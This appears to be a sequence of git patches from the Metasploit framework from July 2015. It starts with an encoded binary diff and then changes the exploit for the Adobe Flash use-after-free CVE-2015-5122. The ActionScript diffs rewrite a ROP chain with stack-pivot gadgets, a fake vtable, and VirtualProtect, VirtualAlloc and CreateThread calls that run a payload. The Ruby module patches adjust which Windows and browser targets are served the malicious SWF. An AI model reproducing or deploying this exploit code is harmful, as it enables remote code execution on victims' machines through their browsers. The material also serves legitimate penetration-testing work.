zMy0$&HTp+{=##_=f1<F#lTg@KTzJ>@S+7y(N_u$@A@pA<^qVpatp?sAmwXRUw||uj
zjejJ)sMAWXx07DfWu@0YlU~$erPto17j;+ZWl`Eyi8lUNwlOA_k6qUPP}C7wXi3Hr
z0MHLxrV?#FGjwtqc>{fW?O>rn+cU}kLS!yp-1-*_#mC(uY8V>NzcfNaV^OJ7V(Z~~
znh0$f7haRRFoyLt<o2Qb_pqwKHh&+{!bBtr)H#ol$Ad{+Vci%?)PXd~`(F}MXrD7H
z_R+m7fv!kGPwiuK8-k_V2kG+Y#X%f6K!TRfi%YbNx!69~kj20exi$ol$sta>QxG^~
z=i7#T=powe-|0y-ZE8KG)~SOzOn~Gy(%4JEIHti9hr)w6@gj{$JJV@#+J6bsk(f87
zEbe4rqK(<lV*o<*Mbgk-HcaM_SU?=Z)`KDd=PfnmRROKGwzdX`ywbcleqd6ZfXgr}
zUQ<nAi#{CaR@Q=h2B%455E=&rdC<ceI`$1zsW@16(NPRIXQmY5_+<h>!mzJPCU|vN
z;T5V!s6H~os}>3d=<!5S6n|7F6XlEwySp&D3rKRVQ1gVEFVq6E!E4}1r9v20giuxk
z*zpJBjN<lqyk57j_#DH7f25R5DB~Q$7#9{Pz7l-z;iCmXeY4q|xwuMk&BHYxmx*fu
zu7$YDaFye#tY&j+@LS6=i`>|n)x;9A=4!Z>C_Zf8<~L%4&{Y@)f`8Zz%rMNR(xxN!
z`k)qww{%d&0TDpWLCuX#8&wbLZtT8jM$mB6HVW8nXbX~iyrfF48_VcL!j&9*pK&h&
zG`De6#GpUq;*mDhbjR@N?NN7t<JI)WpnK-SVM?2BX2kGb$<!YQ0iT%_qxU~@XowB(
zWLxiHX4=bgl=ralm4A!HCe-{m$$XV$fkv`WCs|~?$MC>^7;&wU0$HmLWvrbYMod5#
z3rw&v%zd<%$N}&cGZFL#+5!3@c7VV}j+qC)%d8uDC?lE?@<n|_!3KqKLzE*ZcB#r?
zurHKJA}g8|%8q8!ULo|6h($S+7tPxl#k)9vc_wW=VY`;;bAK?WW?Pd%_E{V)E)Nw%
z3(7-9(IP3J%Y&IO6ZdUxp1)($D}Cl$7m4?88SIS6Ng+A+%_|xkNNFLy<m{J3ohhya
zu*9Aa4>TVx{em-HTBg6uTsP|g6;YO!!u}?>jI<DAa}@DkIdfE6h_Wv}OVyTFW0tDN
zEQJ|KtE;Z6w11}~KvM#hpMN&OfpK+(T3-=>2CtlqCKOJjsYuIDpNcTk*wc)CmMaZ}
zt67dJvyPbwX1`~-i!kxbM!z@cKOtN$Bkvr2Y~INrg@9Zoiw-3X#Wk5tnTl%~t`c0+
zam~QxpTnli#cwHd=eP}MK<G;lnrYc#niAwehE0$agn#0MJ*ODXoMO<NLZ?PFhZsVW
zb4a;8hotahrOY8+V{^!v&Kx4=3So%gJ3i}2a<0fweuUW|lab8gB(qhLIU31a{YMNz
zaf&cDOF$VGvxIKlC1(dHO^5{uGJ@E!Hy(16fKd=K`AhSH^&CtjV~WU(X6}sY%iTmb
zN~R*@cz^d<Q?ZMR*`S<eiE^4Eq_D@k8`0Y1-8VMg9k@M=NNkV85`u%2bHMm=;G+Si
z(0ex#a?$=m77q0ftU&keNxK<W3OoAyhoJW#27^=riwYEMRy@|fZDs$Kc%*5|AUIZL
zcgCRp5B4PDFN*X<2IH-LtA}Ed!Sv{65zI9_)PEU6NI5fY=-*E$iCXsno(oPA*jtFN
z`Mi@wqNIz{Qg`YEvxd~Uvegvg`>l=rR;F!#;^1qGnhIyiP;07d6YC<iwxV1GSWK;}
ztaVlm8X?4Bs-&Xao6<7*`^#^-xsqx?yL4zL7sB)a4$>rB9dwpB%$8&et_z+Eg8*d0
zgnzpPFBEtas}tQ5$%qO5S8z;%U%Z7gvvB3$%EOh9s{mIKt_hRqoOLqudE6SkQUnZs
zb2!u`9Dg%?iAtkXEYa|zx|V=xjcM*BFwV?$?-GF@1KE<4b;6}$NUEA?56Qwd7+elx
z2x)8r-tBxMtQ@O2pT;5w?{|F`>;V`i4Sz@aba&|CJXVGM!nO5TJyt&G;Zm*a_}=k2
zBjPG-pryY733@s9_Cvw%Vq{dsnWB?-zvP=wZD_`kDG+)&aI^<kH*H+szOrEzc%#;3
z!8h37xdp6|ec?@!!Tg3bYgV*2HEbZhmZsG!*Q{vS(2|#;70~2hGQEu(H*7$d=6}`4
ztnzeh85$ymfo*-+jSWplwI9`T94M+<)~|1A&Lo<&qaxea3_`gr(&cGd1_qdxcF<Ij
z4G>u4XzA<nIi8@PTDQS#d#}e@e8?qlw60o8Rzl>^&1qWKlAgKjPN2yMZJo$jantHm
zpuyVEzE9912eIBX?uiWG!q=}}*MGioO*5#jd_c!zw%9lTFkZw9pN4ije;z{THOWlt
zh`(i>4qRYl&@0{T!F3HQTk@ib25q5RL7E+$`;uSFBcDLoh9aJpV_P@0OJ8^7l<pzv
znJ=Nb$F#0OwYCGPE4jCFDbi!Q`?~tKHFOS1qN>8waLp}=kojXFn<Iem$$zlgvexDn
zE!GV?C#}sZTD0!2o=65^^poxDBM5Jz`s`bYk3)GY@k!yKr&=3Uv>xB$k%~8x8%wmV
zIvRe>P(auUk1j#*bhMcuP$1^e?3FF6Hl}q65W8#{>k__|8#jQm%&uc^?-uBS*_B+h
zs^RF?r44{9+tt+WL|o7p-hbM?DLm9aDC>;od?ZsiKJ<D#y=rNGdf@eVv~N?vs+MDr
zVC#zJ_LTmf*B9B=6zlHkY8X?3$v`(AD|H5l^~MUGiF=f#mUS2ft6J!$#6b==<7=!q
z^=6aZI{><FXg;nmC0wWMA?rwyCH3nY+83a4TbGsWP3vI7C^9IOGJlS4f&CW(*5a=<
z7z>Uy7?1sz99Xt}7#diPr#-N2Z#l5C*SD-_LHD9TE(c^*96GM(Fc?O%gKO)Ttv*Jh
z7ifX(qE4`6m&uD$AGX6LdX7UvXGhrHN+V?5#x-c$!j!<RG%g0W44{>>H>_(|wLZ9d
z-O5BJlH6Q&#C8C5Ie%nR79mRp=%#GSVr0q~>;R~-jIrA&e3m_&lUdH(B1d#0w_dCe
zoOGK#0FBy7cImP&6HL6j%Ln(y7K&gcG+N-bC4#4WF;+hB%if;Q7Y7rw!$H0ZQkLk+
z;AKhIxW&FZd1GviPn4qLUm#y%eGe$7R#hLU)~c%jM6an00DpN-<Y>@g1Ax06D0FN*
zR1%#~RSjXotIGpmJp+UsKDBkgl2+7L)B-tPUtbHvCvF1?S|!n?ff@pT*HqOL(zLb)
z5=3e>AR(#-F1@NMP!2+(06^|~RZRuHDynL$D=YM>x_bBr$}15vP*ICK1ga{kNCL~M
z2asF%2WqS9A%E+zSwcwEfF1ys5!`ikH2@`+BNsZbt^kBrSJs264cg!!LaK&sCAa~9
zg#<>uLa#x{dcCHi7D(9|1gX|*0IaRkVVJ45Qm+ARTtKg>s|SMC-hd&{Z24!}a;X6>
zze268N`B=G77od;oFme|a_kKkz*_CkokFSfjhz?RXMe)BONmft2o>Z;U^W7$5eSW7
zu4$oA%cWVSfKY3MS|`*+LOo2VM+kL^P#cBXEYzS-mkD)w!iLit*l-f+2B97;)MJHu
zyiiXRYMW5MBGe9{b_q2q)R<8Fg(?B6>Sm$#2o>x`TZDQmbDxZltlP*Eoq=^*pt`#6
z98RBDn}2(Hl|^x^X$+-iE8BJouI;!^#r0KO|A*^qxW10-8@PrU#Azf>CvgUeGfC_q
zaTbZQNt{FCToUJzIG@A?BrYUz5s7b-_!fzaNnAqW+axX}aT$rrNnAnVN)lI*xSGUw
zNPL&X_egx7#5E+YC2<{z>q*=|;s+#tNa98kH-C}1nZ%Ds+(P2V>~_Ys-9gSf8LL@D
zACPP@eK}SE1{Y)jXE!R~d^rZ3FUNqh8x?SNqXM)WC4wRVz>eVxx&nEO33t#PC}1#Z
z74!s(K+Wt8dIQCbd3-@%U=q~kGlCg`DUA6tgPDP8U?a*3W(B5$|0p|{9l#M)R!%S{
zfPZ7C?A%~(0B1fqdBMB@4smkxgZY8^jO7&s3j#QF$uA5R2Fe&KC<+z@Di|xA5S$RG
zg5j;=U~!<Du?Z7{69cu36;BFI3e+<;adL2SU@-%)bZ|=GaDXtU2B!v&WcacUP75?J
zHnk*J5@=#<+VtS`Knr6fGlDY$OBtI!Gk-WU(8|~hf6yN|im{oqg0liE8S~E$&JL_*
zY}TCMoWNQJa|6M-f%ObqgTd0kM#kpO3(gB1!&vG3;QYXGjLkEHX5a+I<}U~?2!t3j
z7X}vw+8J9=7Ay;d8CzH$EDv-tR#p+L2t*hwuMAcOHZfLF6|4$$GguB%Sq*)$V}I5|
zLuon?407Agffv%YU&Gk8U;Ef6`&Y+y{jNya^}EN}^}~0%0j?8a=EMZP)5Tk?&1L4r
zaK4o9I-9q-&4L&#Bo(@E;B6kWC<Z!_37&^|o7XIk!K~3l?;m)Z&zuzV?PZgFAM&;g
zb4n}&7PvAlRogPnX|c?`tR(YBwSO(koF2>C%VuQ#T5ZcVXU4K&H8=ZpwJpb-70ZDg
ztems7wp?>gEO#%Pn|rg?mS>j6^7gWMd5>vr`R4psJ^*<6uV`%r=7LxOAbADf(%TBn
zvRL6>R$h3I-d1E*#EM{Gspwg~ZGu@9!?#jk!drS<u~{7}-pgvRx7#++tbdK+^Qms)
z4~(`+W_@hZUbbk`!$#X=b8!q`REJIegV8p{JUli92AQUOXtYf=kBs3XYsu9A8Ew<d
zhS;>dtZ~{^qOHViik0kT%_ZL#ZPU$`*mQ8jOus?2%`lh7W`GxF#$%#wrr8>s2`-qK
zyG5JdJSyhj%U1aRE!t+8D}Q77W?MDuVprR2b9HPs=vijp=4zW`u8qwBJ<FUYTy1mB
z^|84)<(vB#S6ivMF;)t&TIp%-wt40;#6ffHyldTU^UdRkgXZ}854qb+^916cInjK{
z-L}9C5eH4%f{)y73(a=op!v$et2}LGW;j;1mvxl=)YDdOcE-?mx_`=__q0`*kyyoE
z7Oi;4(^hG2ih-~yR(X-Pt;+0<Rncdq1~k{)cTTcy1Xa#nwpqCmt=_{(_VOFOxbY(|
z?di0t)-7K8=mhmT&Nol8euD7U{oYVbs5V*~s*BbUdT4nKF`3i0jW!+Iv?o~;Lx+V9
zj~-qgS`=L*1?||xYJYIY-mv+zNPeD@F`%-2jR7ULYL+U?Kko{NVqCm$j93V*#(IVB
zF534lSs6OOtwmDr*4ALgKF+Ghwsq@QNW-p)9SvL6@Bh=-aU3SKfsZ+Gz7Cn?*1kB@
zg9jt~%liK>@gmbpzgT_~A1Ymms!g>hkz#1VV}JIL`j|Qx?|*6eVyR&#VvX|!MG2<s
zoO|di&(<>cwzoH|uWD~!xHZyg9F32b{=tM95P|2K@sTdNq&10n!xzj6*$%bar}az3
zklxZf+9yEU8*dog<iatdwDk$C)S)edeetF*mI}D3ds?yYflsPahLY^_&H~il2~63c
zJnRc5LYpO#41b)OMh2l47$FkoFW8@ObV?>fBptZivT?p<7Jadtb)&y&-H33-7khqC
za&4nirR9kXzZ_uB+0Tqf25%1#x?sOE)WNo9HE75NG|;jJrpRa0JJ8rHr&U55Ppibo
zQF6~g4p9x?Kozv3mpYE1hF4ePP00&vkW|&@?I!`8;D6MYXQXv1t){NB+>kqL5ty2-
zug%$~4e>QtT`70NHJsX17Vf`Rp^aQoxgRS%DzpKGw04zUm|K|dnuimWV#m@Iwv2J6
ztmT31b&8G?3pQ1-X@ZpqHcJ@urID*DVN?sFRv7idSS*agg>j@X8f*?%*pvn48~d%;
zSjK)Y8GpQD&|~4u4HxJ#IrgKohBGo1UUa6yC!DD%F1LqGIfr?@#S<q@R@^hr#ERNK
zJX3McMqsad?(obx06F1{hAEjQTd)vU8LkRkmAC@9YH-!zT7>H`Tu0zqf~yf%Gp-;j
zg0@d)25ec8>Wj2)1&da&Zk5r5lOz>(t#Ia?)qg<Nt+Gia$$(ueShoVe8P=^}*UH1(
zuxkbDRt3_!RUt8v!bT~}VntZ7vJ5hBW!v`7!kgc*?L93tfy`SKIWPK0sZvl3U{GvO
zLp)t6c-+BE#x!(tCt$jP9Vg&E=9HAxpLcoSMDL(P(hrERMo6_@XM-=&gX}l|&O~^y
z5r3yv2P#v*Ap12IrNWq;eVpNu#~C=k;B<bWdVv^l&MZiq5hn?PxqvEg`IyS>lL<yA
z6FxA?(K!gU4<4ZNh79|ABEOB5gy}>s^*}+his6G3eEUE_vvNZkk*b!HAOo4|JDSsw
zO=CxF_KpuuhNYQ<#6oR)4w}x{403LL$$zti&uCXdnU0BKjWk|ETU2(NISTnsMjAeE
zA8|I(oW~Ecg=Vk(Que`|M-sI&ZWGPvCmy+p(?X!Egb|IgO|>*kf~?{%zNJ=C6$sE&
zUE>^-S3x2Bpa>leTHTd6paVa(eI}k)SRi+c<jESrbL@R0dHk(ms|W{bK<ju((SKQ;
z?9R3KW;8|9btB^(l{RO5J~zm=6)&*$*q<?q*o0zS6LC$#HDxNBFb%&YOnBvqw<=G(
zxsUcOs0RnhgdS6XqS0vI0^iGmzL&vQC%>1A_xW6&XMZkJSEpPoe8*)ir9f_FDc~{;
z!pk9i>QdY}%K6AyNlHPgwTgxVjDH~;ChqmpQ#ne%)gKbLTv3-)$isn~HLx>^JuPim
zJZ}x!hN_)U9~VA-GRSmrIUR6IAwPWt;<G<}E*P^kOK<ZsXC0XsMoY31uld9R^XQg!
z>#;38FE%tZ0OL#BwryJ&?&|M|U@_2JhF!p#vM9PeJ_gF<!l^IZ;|(mVS$|l*u(GPM
zyh1th^Y(qp)nX@c^n3%$Z0uiW4D`cV*Y;p{PXvD%UEP~t^~n{3(I>Lu<m!&E@7~lG
z>GExj40cDiH_O{aDTjIX8h3+4y@_@^&dm0-NJYCHtGhiBt-C!DZ$^7+#1q;N5OccK
z)JzAt=S&7Pu;c>DDO{rJ$A67c(G`h?xAY9nA0PYxX%b8?xi(8gZI^^@5qCgZs)@qw
z_hzEJbdvywX;0d3E~hjUBJnY@pViJG9!`8-?h`DnMJSDZie|SR-69l4S_V_whyon^
zeF(!bRpnK+FriA5R84(7HvemYL#)7x6MOn~T7XUfU`tinvV#j-@P8VNLeyaOSOpQN
z2xv8gT&$^wALcArf2gjnOMIDqmfdj;Ck6pv6QHX})16*eA}70IdhfDK!LkI)CIhJ0
zKx27=Nf;2bx5kTwHl3h9;5A52f`nZZG(~EQu@UZGOv@!5KtwP8`F!4@b40?<DNT$M
zVUmER#tg+f30MReJ%9DW%C-*{Pcx>$l4!<^;R40$hwm)-&c^JiEBSNS+)`ZgaLvbM
z;#z=fA+9o9<+v(vRpP3`g{{`P)wpVK)#9qdRgY`Y;cV^^_&t&p7P+xl%>jbZi=_dq
zoI*8PlYgi%cB*0um4E0tWD(UcY@j2^B~f3VB}#_E+-|au>VI)JVFl^M<c(;2d1NLv
zgUdfMfr@maBIT3W(B1Z6PGy+Zy)>;e5Z%*so}1^R`CfCF;Zv2XU7FqvxN|+t#zLtl
zwgd<_hw!KnUJb&hLu45B2-rYs4^2=N;8yd_QB3MBJ9ou2D@ZfEj#oj49y6?EHj=T`
z1~M)O8LK<yv42+3^iO~bAL5B&qw6F>F=D+%ei`ulI{b#A%BH~++1GT!bW2TZXjex;
z+HI?1lkcqrc)AU~glLka)a3gZ`ThpJ9{8e{Y5D~C{tmu?Un;+2)-!-oAt%q$QcW5&
zr>9<{r(VZXw9STHdpliVGoi8oUouedN%&q&*vfAMhA2tMNs#y?Y@ZhaIhlf&j1?kY
ZdL#MrXnhV2mY)9ZA!P~N{|`JHl_ussr&Is{

diff --git a/external/source/exploits/CVE-2015-5122/Exploiter.as b/external/source/exploits/CVE-2015-5122/Exploiter.as
index a5e97e3f9e..ecbf56fac5 100755
--- a/external/source/exploits/CVE-2015-5122/Exploiter.as
+++ b/external/source/exploits/CVE-2015-5122/Exploiter.as
@@ -164,34 +164,22 @@ package
             var memcpy:uint = pe.procedure("memcpy", ntdll)
             var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
             var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
-            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, flash)
-			
-			Logger.log("add esp c ret: " + addespcret.toString(16))
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
             
             // Continuation of execution
             eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
             eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
             eba.write(0, "\x89\x03", false) // mov [ebx], eax
-            //eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
-			
-			eba.write(0, "\x31\xC0", false) // xor eax, eax
-			eba.write(0, "\x87\xf4\xC2\x04\x00", false) // xchg esp, esi # ret 4
-			
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
             // Put the payload (command) in memory
             eba.write(payload_address + 8, payload, true); // payload
 
             // Put the fake vtabe / stack on memory
-			//for (var i:uint = 0 ; i < 0x100; i = i + 4) {
-				//eba.write(stack_address + 0x18000 + i, 0x41410000 + i)
-			//}
-			
-            eba.write(stack_address + 0x18020, xchgeaxespret) // Initial gadget (stackpivot)
-			eba.write(stack_address + 0x18000, xchgeaxesiret) // save original esp in esi
-			
-			eba.write(0, addespcret)
-			eba.write(stack_address + 0x18014, addespcret)
-			eba.write(stack_address + 0x18024, virtualprotect)
-			//eba.write(0, virtualprotect)
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
 
             // VirtualProtect
             eba.write(0, virtualalloc)
@@ -222,93 +210,12 @@ package
             eba.write(0, 0)
             eba.write(0, 0)
             eba.write(0, 0)
-			
+           
             eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
-			
-			Logger.alert("here we go " + main.toString(16) + " " + (stack_address + 0x18000).toString(16))
-			exploit.hasOwnProperty('msf')
-        }
-		
-		private function do_rop_windows8():void
-        {
-            Logger.log("[*] Exploiter - do_rop_windows()")
-            var pe:PE = new PE(eba)
-            var flash:uint = pe.base(vtable)
-            var winmm:uint = pe.module("winmm.dll", flash)
-            var kernel32:uint = pe.module("kernel32.dll", winmm)            
-            var ntdll:uint = pe.module("ntdll.dll", kernel32)
-            var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
-            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
-            var createthread:uint = pe.procedure("CreateThread", kernel32)
-            var memcpy:uint = pe.procedure("memcpy", ntdll)
-            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
-            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
-            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, flash)
-			
-			Logger.log("add esp c ret: " + addespcret.toString(16))
-            
-            // Continuation of execution
-            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
-            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
-            eba.write(0, "\x89\x03", false) // mov [ebx], eax
-            //eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
-			
-			eba.write(0, "\x31\xC0", false) // xor eax, eax
-			eba.write(0, "\x87\xf4\xC2\x04\x00", false) // xchg esp, esi # ret 4
-			
-            // Put the payload (command) in memory
-            eba.write(payload_address + 8, payload, true); // payload
-
-            // Put the fake vtabe / stack on memory
-			//for (var i:uint = 0 ; i < 0x100; i = i + 4) {
-				//eba.write(stack_address + 0x18000 + i, 0x41410000 + i)
-			//}
-			
-            eba.write(stack_address + 0x18020, xchgeaxespret) // Initial gadget (stackpivot)
-			eba.write(stack_address + 0x18000, xchgeaxesiret) // save original esp in esi
-			
-			eba.write(0, addespcret)
-			eba.write(stack_address + 0x18014, addespcret)
-			eba.write(stack_address + 0x18024, virtualprotect)
-			//eba.write(0, virtualprotect)
-
-            // VirtualProtect
-            eba.write(0, virtualalloc)
-            eba.write(0, buffer + 0x10)
-            eba.write(0, 0x1000)
-            eba.write(0, 0x40)
-            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
-
-            // VirtualAlloc
-            eba.write(0, memcpy)
-            eba.write(0, 0x7f6e0000)
-            eba.write(0, 0x4000)
-            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
-            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
-
-            // memcpy
-            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
-            eba.write(0, 0x7f6e0000)
-            eba.write(0, payload_address + 8)
-            eba.write(0, payload.length) 
-
-            // CreateThread
-            eba.write(0, createthread)
-            eba.write(0, buffer + 0x10) // return to fix things
-            eba.write(0, 0)
-            eba.write(0, 0)
-            eba.write(0, 0x7f6e0000)
-            eba.write(0, 0)
-            eba.write(0, 0)
-            eba.write(0, 0)
-			
-            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
-			
-			Logger.alert("here we go " + main.toString(16) + " " + (stack_address + 0x18000).toString(16))
-			exploit.hasOwnProperty('msf')
+            exploit.toString() // call method in the fake vtable
         }
 
-        /*private function do_rop_windows8():void
+        private function do_rop_windows8():void
         {
             Logger.log("[*] Exploiter - do_rop_windows8()")
             var pe:PE = new PE(eba)
@@ -372,9 +279,8 @@ package
             eba.write(0, 0)
 
             eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
-			Logger.alert("here we go " + main.toString(16) + " " + (stack_address + 0x18000).toString(16))
             exploit.toString() // call method in the fake vtable
-        }*/
+        }
 
         private function do_rop_linux():void
         {

From 115549ca75995c1c01532c1b8e52356f9057fad4 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Sat, 11 Jul 2015 00:42:59 -0500
Subject: [PATCH 0727/1013] Delete old check

---
 .../multi/browser/adobe_flash_opaque_background_uaf.rb      | 6 ------
 1 file changed, 6 deletions(-)

diff --git a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
index cfdb5d99ff..7eaf6ff9f3 100644
--- a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
@@ -86,12 +86,6 @@ class Metasploit3 < Msf::Exploit::Remote
   def on_request_exploit(cli, request, target_info)
     print_status("Request: #{request.uri}")
 
-    if target_info[:os_name] == OperatingSystems::Match::WINDOWS_81 && target_info[:ua_ver] == '11.0'
-      print_warning("Target setup not supported")
-      send_not_found(cli)
-      return
-    end
-
     if request.uri =~ /\.swf$/
       print_status('Sending SWF...')
       send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})

From 6f0b9896e1e623387bc31a53945b6bc9f5fb5942 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Sat, 11 Jul 2015 00:56:18 -0500
Subject: [PATCH 0728/1013] Update description

---
 .../multi/browser/adobe_flash_opaque_background_uaf.rb      | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
index 7eaf6ff9f3..8edfff2ecc 100644
--- a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
@@ -17,11 +17,11 @@ class Metasploit3 < Msf::Exploit::Remote
         This module exploits an use after free on Adobe Flash Player. The vulnerability,
         discovered by Hacking Team and made public on its July 2015 data leak, was
         described as an Use After Free while handling the opaqueBackground property
-        7 setter of the flash.display.DisplayObject class. This module has been tested
-        successfully on:
+        7 setter of the flash.display.DisplayObject class. This module is an early release
+        tested on:
 
         Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.203,
-        Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
+        Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194
       },
       'License'             => MSF_LICENSE,
       'Author'              =>

From 54fc7121316aed7e2e91518a367619ffcc3b2300 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Sat, 11 Jul 2015 01:33:23 -0500
Subject: [PATCH 0729/1013] Update Win 8.1 checks

---
 .../multi/browser/adobe_flash_hacking_team_uaf.rb        | 2 +-
 .../multi/browser/adobe_flash_opaque_background_uaf.rb   | 9 ++++++++-
 2 files changed, 9 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
index 25c711c40a..be89cf6b82 100644
--- a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb
@@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def on_request_exploit(cli, request, target_info)
     print_status("Request: #{request.uri}")
 
-    if target_info[:os_name] == OperatingSystems::Match::WINDOWS_81 && target_info[:ua_ver] == '11.0'
+    if target_info[:os_name] =~ OperatingSystems::Match::WINDOWS_81 && target_info[:ua_ver] == '11.0'
       print_warning("Target setup not supported")
       send_not_found(cli)
       return
diff --git a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
index 8edfff2ecc..7903b4392f 100644
--- a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
@@ -45,7 +45,8 @@ class Metasploit3 < Msf::Exploit::Remote
           :source  => /script|headers/i,
           :arch    => ARCH_X86,
           :os_name => lambda do |os|
-            os =~ OperatingSystems::Match::WINDOWS_7
+            os =~ OperatingSystems::Match::WINDOWS_7 ||
+            os =~ OperatingSystems::Match::WINDOWS_81
           end,
           :ua_name => lambda do |ua|
             case target.name
@@ -86,6 +87,12 @@ class Metasploit3 < Msf::Exploit::Remote
   def on_request_exploit(cli, request, target_info)
     print_status("Request: #{request.uri}")
 
+    if target_info[:os_name] =~ OperatingSystems::Match::WINDOWS_81 && target_info[:ua_ver] == '11.0'
+      print_warning("Target setup not supported")
+      send_not_found(cli)
+      return
+    end
+
     if request.uri =~ /\.swf$/
       print_status('Sending SWF...')
       send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})

From 6eabe5d48c6f077ed945445afe06263afb05d96c Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Sat, 11 Jul 2015 01:36:26 -0500
Subject: [PATCH 0730/1013] Update description

---
 .../multi/browser/adobe_flash_opaque_background_uaf.rb     | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
index 7903b4392f..60c6e7ef51 100644
--- a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
@@ -21,7 +21,12 @@ class Metasploit3 < Msf::Exploit::Remote
         tested on:
 
         Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.203,
-        Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194
+        Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
+        Windows 7 SP1 (32-bit), IE9 and Adobe Flash Flash 18.0.0.203,
+        Windows 7 SP1 (32-bit), Firefox + Adobe Flash 18.0.0.194,
+        windows 8.1, Firefox and Adobe Flash 18.0.0.203,
+        Windows 8.1, Firefox and Adobe Flash 18.0.0.160, and
+        Windows 8.1, Firefox and Adobe Flash 18.0.0.194
       },
       'License'             => MSF_LICENSE,
       'Author'              =>

From 1289ec8863f05dcf47f504b47b66234e25b7f26c Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Sat, 11 Jul 2015 01:38:21 -0500
Subject: [PATCH 0731/1013] authors

---
 .../multi/browser/adobe_flash_opaque_background_uaf.rb       | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
index 60c6e7ef51..1436edfa05 100644
--- a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb
@@ -31,8 +31,9 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'             => MSF_LICENSE,
       'Author'              =>
         [
-          'Unknown', # Vulnerability discovered on HackingTeam info leak
-          'juan vazquez' # msf module
+          'Unknown',      # Vulnerability discovered on HackingTeam info leak
+          'juan vazquez', # Ported to Msf
+          'sinn3r'        # Testing and some editing
         ],
       'References'          =>
         [

From 0ff73330907c339e1e06fffa3659c4c7fe731df2 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Sat, 11 Jul 2015 02:05:56 -0500
Subject: [PATCH 0732/1013] Lower the ranking for CVE-2015-5122

As an initial release we forgot to lower it.
---
 .../exploits/multi/browser/adobe_flash_opaque_background_uaf.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

